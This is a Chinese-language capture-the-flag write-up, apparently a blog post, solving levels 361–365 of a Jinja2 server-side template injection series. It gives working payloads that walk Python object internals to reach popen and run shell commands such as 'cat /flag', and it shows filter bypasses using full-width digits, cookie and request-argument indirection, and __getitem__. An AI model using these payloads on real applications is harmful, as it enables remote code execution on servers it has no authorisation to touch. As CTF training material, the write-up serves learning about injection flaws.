361
提示“名字就是考点”
传参点name
-
获取字符串的类:
"".__class__得到
str的类对象。 -
获取基类:
"".__class__.__bases__[0]这会得到
str类的基类列表,其中第一个元素是object类。 -
获取
object类的所有子类:"".__class__.__bases__[0].__subclasses__()返回一个包含Python中所有类的列表,这些类都是直接或间接从
object继承的。 -
选择特定的子类:
"".__class__.__bases__[0].__subclasses__()[132]选择了列表中的第133个元素(因为索引是从0开始的)。
-
访问
Popen类的初始化方法的全局变量:"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__通过访问
Popen类的__init__方法的__globals__属性,可以获得一个字典,其中包含Popen类定义时可用的所有全局变量。 -
调用
popen:"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']从全局变量字典中获取名为
popen的变量 -
执行系统命令:
"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag')使用
Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。 -
读取命令输出:
调用
read()方法来读取Popen对象的输出,即cat /flag命令的输出。
payload
"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()362
传参试试
轮流试试每个数字,发现只有2和3被过滤
而且只要字符串不包括2和3就能显示
使用全角数字进行绕过
关闭使用半角输入模式
“1234567890”
payload:
?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
363
数字没有被过滤掉
经过各种字母和符号尝试,发现会过滤“”
试试把“”进行url编码看看
还是会被过滤
但是传参会自动补齐双引号,所以索性不加了
?name={{x.__init__.__globals__[request.args.a].eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()
364
它将arg过滤掉了,所以没有办法直接GET传参
改用Cookie传
GET传参
?name={{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}Cookie:
x1=__builtins__;x2=__import__('os').popen('cat /flag').read()
365
尝试Jinja2模板注入
过滤单双引号、[、args
找一下os
{{x.__class__.__bases__.__getitem__(0).__subclasses__()}}
在页面内查找
数出来是132
用__getitem__绕过中括号[过滤,request对象绕过引号''、""过滤,cookie或者values绕过args过滤
得到:
{{x.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.popen(request.cookies.x).read()}}还有Cookie传参
x=ls /
再传
Cookie:x=tac /f*
2273
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
